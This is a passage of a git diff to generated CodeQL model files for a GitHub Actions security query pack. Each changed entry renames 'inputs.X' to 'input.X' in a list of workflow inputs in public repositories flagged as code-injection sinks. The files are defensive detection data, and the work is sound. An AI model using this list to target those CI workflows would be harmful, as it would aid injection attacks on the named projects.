["kairos-io/kairos/.github/workflows/reusable-qemu-netboot-test.yaml", "*", "inputs.flavor_release", "code-injection", "generated"] - - ["kairos-io/kairos/.github/workflows/reusable-qemu-netboot-test.yaml", "*", "inputs.variant", "code-injection", "generated"] - - ["kairos-io/kairos/.github/workflows/reusable-qemu-netboot-test.yaml", "*", "inputs.flavor", "code-injection", "generated"] - - ["kairos-io/kairos/.github/workflows/reusable-qemu-bundles-test.yaml", "*", "inputs.flavor", "code-injection", "generated"] - - ["kairos-io/kairos/.github/workflows/reusable-qemu-acceptance-test.yaml", "*", 
"inputs.port", "code-injection", "generated"] - - ["kairos-io/kairos/.github/workflows/reusable-qemu-acceptance-test.yaml", "*", "inputs.flavor", "code-injection", "generated"] - - ["kairos-io/kairos/.github/workflows/reusable-provider-upgrade-latest-test.yaml", "*", "inputs.flavor_release", "code-injection", "generated"] - - ["kairos-io/kairos/.github/workflows/reusable-provider-upgrade-latest-test.yaml", "*", "inputs.flavor", "code-injection", "generated"] \ No newline at end of file + - ["kairos-io/kairos/.github/workflows/reusable-zfs-test.yaml", "*", "input.flavor", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-upgrade-with-cli-test.yaml", "*", "input.flavor_release", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-upgrade-with-cli-test.yaml", "*", "input.flavor", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-upgrade-latest-test.yaml", "*", "input.family", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-upgrade-latest-test.yaml", "*", "input.flavor_release", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-upgrade-latest-test.yaml", "*", "input.flavor", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-qemu-reset-test.yaml", "*", "input.flavor", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-qemu-netboot-test.yaml", "*", "input.base_image", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-qemu-netboot-test.yaml", "*", "input.family", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-qemu-netboot-test.yaml", "*", "input.model", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-qemu-netboot-test.yaml", "*", "input.flavor_release", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-qemu-netboot-test.yaml", "*", 
"input.variant", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-qemu-netboot-test.yaml", "*", "input.flavor", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-qemu-bundles-test.yaml", "*", "input.flavor", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-qemu-acceptance-test.yaml", "*", "input.port", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-qemu-acceptance-test.yaml", "*", "input.flavor", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-provider-upgrade-latest-test.yaml", "*", "input.flavor_release", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-provider-upgrade-latest-test.yaml", "*", "input.flavor", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/kanidm_kanidm.model.yml b/ql/lib/ext/generated/reusable-workflows/kanidm_kanidm.model.yml index a63ddd5da671..4b4850831911 100644 --- a/ql/lib/ext/generated/reusable-workflows/kanidm_kanidm.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kanidm_kanidm.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["kanidm/kanidm/.github/workflows/kanidm_individual_book.yml", "*", "inputs.tag", "code-injection", "generated"] \ No newline at end of file + - ["kanidm/kanidm/.github/workflows/kanidm_individual_book.yml", "*", "input.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/kata-containers_kata-containers.model.yml b/ql/lib/ext/generated/reusable-workflows/kata-containers_kata-containers.model.yml index e73d0d81875b..f45709cfa0f4 100644 --- a/ql/lib/ext/generated/reusable-workflows/kata-containers_kata-containers.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kata-containers_kata-containers.model.yml 
@@ -3,18 +3,18 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["kata-containers/kata-containers/.github/workflows/release-s390x.yaml", "*", "inputs.target-arch", "code-injection", "generated"] - - ["kata-containers/kata-containers/.github/workflows/release-ppc64le.yaml", "*", "inputs.target-arch", "code-injection", "generated"] - - ["kata-containers/kata-containers/.github/workflows/release-arm64.yaml", "*", "inputs.target-arch", "code-injection", "generated"] - - ["kata-containers/kata-containers/.github/workflows/release-amd64.yaml", "*", "inputs.target-arch", "code-injection", "generated"] - - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-s390x.yaml", "*", "inputs.tag", "code-injection", "generated"] - - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-s390x.yaml", "*", "inputs.repo", "code-injection", "generated"] - - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-s390x.yaml", "*", "inputs.registry", "code-injection", "generated"] - - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-ppc64le.yaml", "*", "inputs.tag", "code-injection", "generated"] - - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-ppc64le.yaml", "*", "inputs.repo", "code-injection", "generated"] - - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-ppc64le.yaml", "*", "inputs.registry", "code-injection", "generated"] - - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-arm64.yaml", "*", "inputs.tag", "code-injection", "generated"] - - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-arm64.yaml", "*", "inputs.repo", "code-injection", "generated"] - - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-arm64.yaml", "*", "inputs.registry", "code-injection", "generated"] - - 
["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-amd64.yaml", "*", "inputs.tag", "code-injection", "generated"] - - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-amd64.yaml", "*", "inputs.repo", "code-injection", "generated"] \ No newline at end of file + - ["kata-containers/kata-containers/.github/workflows/release-s390x.yaml", "*", "input.target-arch", "code-injection", "generated"] + - ["kata-containers/kata-containers/.github/workflows/release-ppc64le.yaml", "*", "input.target-arch", "code-injection", "generated"] + - ["kata-containers/kata-containers/.github/workflows/release-arm64.yaml", "*", "input.target-arch", "code-injection", "generated"] + - ["kata-containers/kata-containers/.github/workflows/release-amd64.yaml", "*", "input.target-arch", "code-injection", "generated"] + - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-s390x.yaml", "*", "input.tag", "code-injection", "generated"] + - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-s390x.yaml", "*", "input.repo", "code-injection", "generated"] + - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-s390x.yaml", "*", "input.registry", "code-injection", "generated"] + - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-ppc64le.yaml", "*", "input.tag", "code-injection", "generated"] + - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-ppc64le.yaml", "*", "input.repo", "code-injection", "generated"] + - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-ppc64le.yaml", "*", "input.registry", "code-injection", "generated"] + - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-arm64.yaml", "*", "input.tag", "code-injection", "generated"] + - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-arm64.yaml", "*", 
"input.repo", "code-injection", "generated"] + - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-arm64.yaml", "*", "input.registry", "code-injection", "generated"] + - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-amd64.yaml", "*", "input.tag", "code-injection", "generated"] + - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-amd64.yaml", "*", "input.repo", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/kiali_kiali.model.yml b/ql/lib/ext/generated/reusable-workflows/kiali_kiali.model.yml index 3a9119898744..1d8dc84c2f04 100644 --- a/ql/lib/ext/generated/reusable-workflows/kiali_kiali.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kiali_kiali.model.yml 
@@ -3,14 +3,14 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["kiali/kiali/.github/workflows/test-images-creator.yml", "*", "inputs.build_mode", "code-injection", "generated"] - - ["kiali/kiali/.github/workflows/test-images-creator.yml", "*", "inputs.release_branch", "code-injection", "generated"] - - ["kiali/kiali/.github/workflows/test-images-creator.yml", "*", "inputs.images_tag", "code-injection", "generated"] - - ["kiali/kiali/.github/workflows/test-images-creator.yml", "*", "inputs.quay_org", "code-injection", "generated"] - - ["kiali/kiali/.github/workflows/integration-tests-frontend.yml", "*", "inputs.istio_version", "code-injection", "generated"] - - ["kiali/kiali/.github/workflows/integration-tests-frontend-tempo.yml", "*", "inputs.istio_version", "code-injection", "generated"] - - ["kiali/kiali/.github/workflows/integration-tests-frontend-multicluster-primary-remote.yml", "*", "inputs.istio_version", "code-injection", "generated"] - - ["kiali/kiali/.github/workflows/integration-tests-frontend-multicluster-multi-primary.yml", "*", "inputs.istio_version", "code-injection", "generated"] - - ["kiali/kiali/.github/workflows/integration-tests-backend.yml", "*", "inputs.istio_version", "code-injection", "generated"] - - ["kiali/kiali/.github/workflows/integration-tests-backend-multicluster-external-controlplane.yml", "*", "inputs.istio_version", "code-injection", "generated"] - - ["kiali/kiali/.github/workflows/build-frontend.yml", "*", "inputs.target_branch", "code-injection", "generated"] \ No newline at end of file + - ["kiali/kiali/.github/workflows/test-images-creator.yml", "*", "input.build_mode", "code-injection", "generated"] + - ["kiali/kiali/.github/workflows/test-images-creator.yml", "*", "input.release_branch", "code-injection", "generated"] + - ["kiali/kiali/.github/workflows/test-images-creator.yml", "*", "input.images_tag", "code-injection", "generated"] + - 
["kiali/kiali/.github/workflows/test-images-creator.yml", "*", "input.quay_org", "code-injection", "generated"] + - ["kiali/kiali/.github/workflows/integration-tests-frontend.yml", "*", "input.istio_version", "code-injection", "generated"] + - ["kiali/kiali/.github/workflows/integration-tests-frontend-tempo.yml", "*", "input.istio_version", "code-injection", "generated"] + - ["kiali/kiali/.github/workflows/integration-tests-frontend-multicluster-primary-remote.yml", "*", "input.istio_version", "code-injection", "generated"] + - ["kiali/kiali/.github/workflows/integration-tests-frontend-multicluster-multi-primary.yml", "*", "input.istio_version", "code-injection", "generated"] + - ["kiali/kiali/.github/workflows/integration-tests-backend.yml", "*", "input.istio_version", "code-injection", "generated"] + - ["kiali/kiali/.github/workflows/integration-tests-backend-multicluster-external-controlplane.yml", "*", "input.istio_version", "code-injection", "generated"] + - ["kiali/kiali/.github/workflows/build-frontend.yml", "*", "input.target_branch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/kotest_kotest.model.yml b/ql/lib/ext/generated/reusable-workflows/kotest_kotest.model.yml index 3c525970eccd..f404aa73762f 100644 --- a/ql/lib/ext/generated/reusable-workflows/kotest_kotest.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kotest_kotest.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["kotest/kotest/.github/workflows/run-gradle.yml", "*", "inputs.task", "code-injection", "generated"] \ No newline at end of file + - ["kotest/kotest/.github/workflows/run-gradle.yml", "*", "input.task", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/kubernetes_ingress-nginx.model.yml b/ql/lib/ext/generated/reusable-workflows/kubernetes_ingress-nginx.model.yml index 187b3d2fd0a7..2f546ce3f577 100644 --- a/ql/lib/ext/generated/reusable-workflows/kubernetes_ingress-nginx.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kubernetes_ingress-nginx.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["kubernetes/ingress-nginx/.github/workflows/zz-tmpl-k8s-e2e.yaml", "*", "inputs.k8s-version", "code-injection", "generated"] - - ["kubernetes/ingress-nginx/.github/workflows/zz-tmpl-images.yaml", "*", "inputs.name", "code-injection", "generated"] \ No newline at end of file + - ["kubernetes/ingress-nginx/.github/workflows/zz-tmpl-k8s-e2e.yaml", "*", "input.k8s-version", "code-injection", "generated"] + - ["kubernetes/ingress-nginx/.github/workflows/zz-tmpl-images.yaml", "*", "input.name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/kubescape_kubescape.model.yml b/ql/lib/ext/generated/reusable-workflows/kubescape_kubescape.model.yml index 3e11359c6b36..9e8b1e439939 100644 --- a/ql/lib/ext/generated/reusable-workflows/kubescape_kubescape.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kubescape_kubescape.model.yml 
@@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["kubescape/kubescape/.github/workflows/d-publish-image.yaml", "*", "inputs.image_tag", "code-injection", "generated"] - - ["kubescape/kubescape/.github/workflows/d-publish-image.yaml", "*", "inputs.image_name", "code-injection", "generated"] - - ["kubescape/kubescape/.github/workflows/d-publish-image.yaml", "*", "inputs.client", "code-injection", "generated"] - - ["kubescape/kubescape/.github/workflows/a-pr-scanner.yaml", "*", "inputs.UNIT_TESTS_PATH", "code-injection", "generated"] \ No newline at end of file + - ["kubescape/kubescape/.github/workflows/d-publish-image.yaml", "*", "input.image_tag", "code-injection", "generated"] + - ["kubescape/kubescape/.github/workflows/d-publish-image.yaml", "*", "input.image_name", "code-injection", "generated"] + - ["kubescape/kubescape/.github/workflows/d-publish-image.yaml", "*", "input.client", "code-injection", "generated"] + - ["kubescape/kubescape/.github/workflows/a-pr-scanner.yaml", "*", "input.UNIT_TESTS_PATH", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/kubeshop_botkube.model.yml b/ql/lib/ext/generated/reusable-workflows/kubeshop_botkube.model.yml index 819f9f0e35d8..20a24a4ec7f0 100644 --- a/ql/lib/ext/generated/reusable-workflows/kubeshop_botkube.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kubeshop_botkube.model.yml 
@@ -3,8 +3,8 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["kubeshop/botkube/.github/workflows/process-chart.yml", "*", "inputs.next-version", "code-injection", "generated"] - - ["kubeshop/botkube/.github/workflows/process-chart.yml", "*", "inputs.release-branch", "code-injection", "generated"] + - ["kubeshop/botkube/.github/workflows/process-chart.yml", "*", "input.next-version", "code-injection", "generated"] + - ["kubeshop/botkube/.github/workflows/process-chart.yml", "*", "input.release-branch", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all extensible: summaryModel diff --git a/ql/lib/ext/generated/reusable-workflows/kumahq_kuma.model.yml b/ql/lib/ext/generated/reusable-workflows/kumahq_kuma.model.yml index 9f30976bbadc..666a86caf881 100644 --- a/ql/lib/ext/generated/reusable-workflows/kumahq_kuma.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kumahq_kuma.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["kumahq/kuma/.github/workflows/_build_publish.yaml", "*", "inputs.VERSION_NAME", "code-injection", "generated"] - - ["kumahq/kuma/.github/workflows/_build_publish.yaml", "*", "inputs.REGISTRY", "code-injection", "generated"] - - ["kumahq/kuma/.github/workflows/_test.yaml", "*", "inputs.FULL_MATRIX", "code-injection", "generated"] - - ["kumahq/kuma/.github/workflows/_e2e.yaml", "*", "inputs.matrix", "code-injection", "generated"] \ No newline at end of file + - ["kumahq/kuma/.github/workflows/_build_publish.yaml", "*", "input.VERSION_NAME", "code-injection", "generated"] + - ["kumahq/kuma/.github/workflows/_build_publish.yaml", "*", "input.REGISTRY", "code-injection", "generated"] + - ["kumahq/kuma/.github/workflows/_test.yaml", "*", "input.FULL_MATRIX", "code-injection", "generated"] + - ["kumahq/kuma/.github/workflows/_e2e.yaml", "*", "input.matrix", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/labring_sealos.model.yml b/ql/lib/ext/generated/reusable-workflows/labring_sealos.model.yml index 81a419fec0d8..d4926952f1ad 100644 --- a/ql/lib/ext/generated/reusable-workflows/labring_sealos.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/labring_sealos.model.yml 
@@ -3,13 +3,13 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["labring/sealos/.github/workflows/services.yml", "*", "inputs.push_image_tag", "code-injection", "generated"] - - ["labring/sealos/.github/workflows/services.yml", "*", "inputs.push_image", "code-injection", "generated"] - - ["labring/sealos/.github/workflows/objectstorage.yaml", "*", "inputs.build_from", "code-injection", "generated"] - - ["labring/sealos/.github/workflows/objectstorage.yaml", "*", "inputs.push_image_tag", "code-injection", "generated"] - - ["labring/sealos/.github/workflows/objectstorage.yaml", "*", "inputs.push_image", "code-injection", "generated"] - - ["labring/sealos/.github/workflows/import-patch-image.yml", "*", "inputs.arch", "code-injection", "generated"] - - ["labring/sealos/.github/workflows/frontend.yml", "*", "inputs.push_image_tag", "code-injection", "generated"] - - ["labring/sealos/.github/workflows/frontend.yml", "*", "inputs.push_image", "code-injection", "generated"] - - ["labring/sealos/.github/workflows/controllers.yml", "*", "inputs.push_image_tag", "code-injection", "generated"] - - ["labring/sealos/.github/workflows/controllers.yml", "*", "inputs.push_image", "code-injection", "generated"] \ No newline at end of file + - ["labring/sealos/.github/workflows/services.yml", "*", "input.push_image_tag", "code-injection", "generated"] + - ["labring/sealos/.github/workflows/services.yml", "*", "input.push_image", "code-injection", "generated"] + - ["labring/sealos/.github/workflows/objectstorage.yaml", "*", "input.build_from", "code-injection", "generated"] + - ["labring/sealos/.github/workflows/objectstorage.yaml", "*", "input.push_image_tag", "code-injection", "generated"] + - ["labring/sealos/.github/workflows/objectstorage.yaml", "*", "input.push_image", "code-injection", "generated"] + - ["labring/sealos/.github/workflows/import-patch-image.yml", "*", "input.arch", "code-injection", "generated"] + - 
["labring/sealos/.github/workflows/frontend.yml", "*", "input.push_image_tag", "code-injection", "generated"] + - ["labring/sealos/.github/workflows/frontend.yml", "*", "input.push_image", "code-injection", "generated"] + - ["labring/sealos/.github/workflows/controllers.yml", "*", "input.push_image_tag", "code-injection", "generated"] + - ["labring/sealos/.github/workflows/controllers.yml", "*", "input.push_image", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/laion-ai_open-assistant.model.yml b/ql/lib/ext/generated/reusable-workflows/laion-ai_open-assistant.model.yml index 35fd748afbee..144c16ff8de2 100644 --- a/ql/lib/ext/generated/reusable-workflows/laion-ai_open-assistant.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/laion-ai_open-assistant.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["laion-ai/open-assistant/.github/workflows/docker-build.yaml", "*", "inputs.context", "code-injection", "generated"] \ No newline at end of file + - ["laion-ai/open-assistant/.github/workflows/docker-build.yaml", "*", "input.context", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/learningequality_kolibri.model.yml b/ql/lib/ext/generated/reusable-workflows/learningequality_kolibri.model.yml index 192b1b608438..f97ee81bcb92 100644 --- a/ql/lib/ext/generated/reusable-workflows/learningequality_kolibri.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/learningequality_kolibri.model.yml 
@@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["learningequality/kolibri/.github/workflows/upload_github_release_asset.yml", "*", "inputs.release_id", "code-injection", "generated"] - - ["learningequality/kolibri/.github/workflows/upload_github_release_asset.yml", "*", "inputs.filename", "code-injection", "generated"] - - ["learningequality/kolibri/.github/workflows/pypi_upload.yml", "*", "inputs.tar-file-name", "code-injection", "generated"] - - ["learningequality/kolibri/.github/workflows/pypi_upload.yml", "*", "inputs.whl-file-name", "code-injection", "generated"] \ No newline at end of file + - ["learningequality/kolibri/.github/workflows/upload_github_release_asset.yml", "*", "input.release_id", "code-injection", "generated"] + - ["learningequality/kolibri/.github/workflows/upload_github_release_asset.yml", "*", "input.filename", "code-injection", "generated"] + - ["learningequality/kolibri/.github/workflows/pypi_upload.yml", "*", "input.tar-file-name", "code-injection", "generated"] + - ["learningequality/kolibri/.github/workflows/pypi_upload.yml", "*", "input.whl-file-name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/lensesio_stream-reactor.model.yml b/ql/lib/ext/generated/reusable-workflows/lensesio_stream-reactor.model.yml index 5a397f743a3c..401875059ec5 100644 --- a/ql/lib/ext/generated/reusable-workflows/lensesio_stream-reactor.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/lensesio_stream-reactor.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["lensesio/stream-reactor/.github/workflows/build.yml", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file + - ["lensesio/stream-reactor/.github/workflows/build.yml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/leptos-rs_leptos.model.yml b/ql/lib/ext/generated/reusable-workflows/leptos-rs_leptos.model.yml index 97f40ee7c07e..6d6f9e177402 100644 --- a/ql/lib/ext/generated/reusable-workflows/leptos-rs_leptos.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/leptos-rs_leptos.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["leptos-rs/leptos/.github/workflows/run-cargo-make-task.yml", "*", "inputs.directory", "code-injection", "generated"] - - ["leptos-rs/leptos/.github/workflows/run-cargo-make-task.yml", "*", "inputs.cargo_make_task", "code-injection", "generated"] - - ["leptos-rs/leptos/.github/workflows/get-changed-examples-matrix.yml", "*", "inputs.example_changed", "code-injection", "generated"] \ No newline at end of file + - ["leptos-rs/leptos/.github/workflows/run-cargo-make-task.yml", "*", "input.directory", "code-injection", "generated"] + - ["leptos-rs/leptos/.github/workflows/run-cargo-make-task.yml", "*", "input.cargo_make_task", "code-injection", "generated"] + - ["leptos-rs/leptos/.github/workflows/get-changed-examples-matrix.yml", "*", "input.example_changed", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/lightning-ai_pytorch-lightning.model.yml b/ql/lib/ext/generated/reusable-workflows/lightning-ai_pytorch-lightning.model.yml index 293939322e2b..a4b2b55262ff 100644 --- a/ql/lib/ext/generated/reusable-workflows/lightning-ai_pytorch-lightning.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/lightning-ai_pytorch-lightning.model.yml 
@@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["lightning-ai/pytorch-lightning/.github/workflows/_legacy-checkpoints.yml", "*", "inputs.push_to_s3", "code-injection", "generated"] - - ["lightning-ai/pytorch-lightning/.github/workflows/_legacy-checkpoints.yml", "*", "inputs.pl_version", "code-injection", "generated"] \ No newline at end of file + - ["lightning-ai/pytorch-lightning/.github/workflows/_legacy-checkpoints.yml", "*", "input.push_to_s3", "code-injection", "generated"] + - ["lightning-ai/pytorch-lightning/.github/workflows/_legacy-checkpoints.yml", "*", "input.pl_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/liquibase_liquibase.model.yml b/ql/lib/ext/generated/reusable-workflows/liquibase_liquibase.model.yml index c3aa198743d5..dd3bfe71b7b1 100644 --- a/ql/lib/ext/generated/reusable-workflows/liquibase_liquibase.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/liquibase_liquibase.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["liquibase/liquibase/.github/workflows/build-azure-uber-jar.yml", "*", "inputs.liquibase-version", "code-injection", "generated"] \ No newline at end of file + - ["liquibase/liquibase/.github/workflows/build-azure-uber-jar.yml", "*", "input.liquibase-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/litestar-org_litestar.model.yml b/ql/lib/ext/generated/reusable-workflows/litestar-org_litestar.model.yml index 1ea78b01cd6b..2207feeec224 100644 --- a/ql/lib/ext/generated/reusable-workflows/litestar-org_litestar.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/litestar-org_litestar.model.yml 
@@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["litestar-org/litestar/.github/workflows/test.yml", "*", "inputs.python-version", "code-injection", "generated"] - - ["litestar-org/litestar/.github/workflows/notify-released-issues.yml", "*", "inputs.release_tag", "code-injection", "generated"] \ No newline at end of file + - ["litestar-org/litestar/.github/workflows/test.yml", "*", "input.python-version", "code-injection", "generated"] + - ["litestar-org/litestar/.github/workflows/notify-released-issues.yml", "*", "input.release_tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/llvm_circt.model.yml b/ql/lib/ext/generated/reusable-workflows/llvm_circt.model.yml index 23bd3adc5a40..2128369a7a95 100644 --- a/ql/lib/ext/generated/reusable-workflows/llvm_circt.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/llvm_circt.model.yml 
@@ -3,11 +3,11 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["llvm/circt/.github/workflows/unifiedBuildTestAndInstall.yml", "*", "inputs.package_name_prefix", "code-injection", "generated"] - - ["llvm/circt/.github/workflows/unifiedBuildTestAndInstall.yml", "*", "inputs.install", "code-injection", "generated"] - - ["llvm/circt/.github/workflows/unifiedBuildTestAndInstall.yml", "*", "inputs.llvm_force_enable_stats", "code-injection", "generated"] - - ["llvm/circt/.github/workflows/unifiedBuildTestAndInstall.yml", "*", "inputs.llvm_enable_assertions", "code-injection", "generated"] - - ["llvm/circt/.github/workflows/unifiedBuildTestAndInstall.yml", "*", "inputs.build_shared_libs", "code-injection", "generated"] - - ["llvm/circt/.github/workflows/unifiedBuildTestAndInstall.yml", "*", "inputs.cmake_build_type", "code-injection", "generated"] - - ["llvm/circt/.github/workflows/unifiedBuildTestAndInstall.yml", "*", "inputs.cmake_cxx_compiler", "code-injection", "generated"] - - ["llvm/circt/.github/workflows/unifiedBuildTestAndInstall.yml", "*", "inputs.cmake_c_compiler", "code-injection", "generated"] \ No newline at end of file + - ["llvm/circt/.github/workflows/unifiedBuildTestAndInstall.yml", "*", "input.package_name_prefix", "code-injection", "generated"] + - ["llvm/circt/.github/workflows/unifiedBuildTestAndInstall.yml", "*", "input.install", "code-injection", "generated"] + - ["llvm/circt/.github/workflows/unifiedBuildTestAndInstall.yml", "*", "input.llvm_force_enable_stats", "code-injection", "generated"] + - ["llvm/circt/.github/workflows/unifiedBuildTestAndInstall.yml", "*", "input.llvm_enable_assertions", "code-injection", "generated"] + - ["llvm/circt/.github/workflows/unifiedBuildTestAndInstall.yml", "*", "input.build_shared_libs", "code-injection", "generated"] + - ["llvm/circt/.github/workflows/unifiedBuildTestAndInstall.yml", "*", "input.cmake_build_type", "code-injection", "generated"] + - 
["llvm/circt/.github/workflows/unifiedBuildTestAndInstall.yml", "*", "input.cmake_cxx_compiler", "code-injection", "generated"] + - ["llvm/circt/.github/workflows/unifiedBuildTestAndInstall.yml", "*", "input.cmake_c_compiler", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/lnbits_lnbits.model.yml b/ql/lib/ext/generated/reusable-workflows/lnbits_lnbits.model.yml index 77c7570ec0e5..57791c68c0ae 100644 --- a/ql/lib/ext/generated/reusable-workflows/lnbits_lnbits.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/lnbits_lnbits.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["lnbits/lnbits/.github/workflows/make.yml", "*", "inputs.make", "code-injection", "generated"] \ No newline at end of file + - ["lnbits/lnbits/.github/workflows/make.yml", "*", "input.make", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/lutris_lutris.model.yml b/ql/lib/ext/generated/reusable-workflows/lutris_lutris.model.yml index 46cc50923557..2a65a351255d 100644 --- a/ql/lib/ext/generated/reusable-workflows/lutris_lutris.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/lutris_lutris.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["lutris/lutris/.github/workflows/publish-ppa.yml", "*", "inputs.PPA_URI", "code-injection", "generated"] \ No newline at end of file + - ["lutris/lutris/.github/workflows/publish-ppa.yml", "*", "input.PPA_URI", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/mailu_mailu.model.yml b/ql/lib/ext/generated/reusable-workflows/mailu_mailu.model.yml index 78a5584d04b4..53f6f6da728d 100644 --- a/ql/lib/ext/generated/reusable-workflows/mailu_mailu.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mailu_mailu.model.yml 
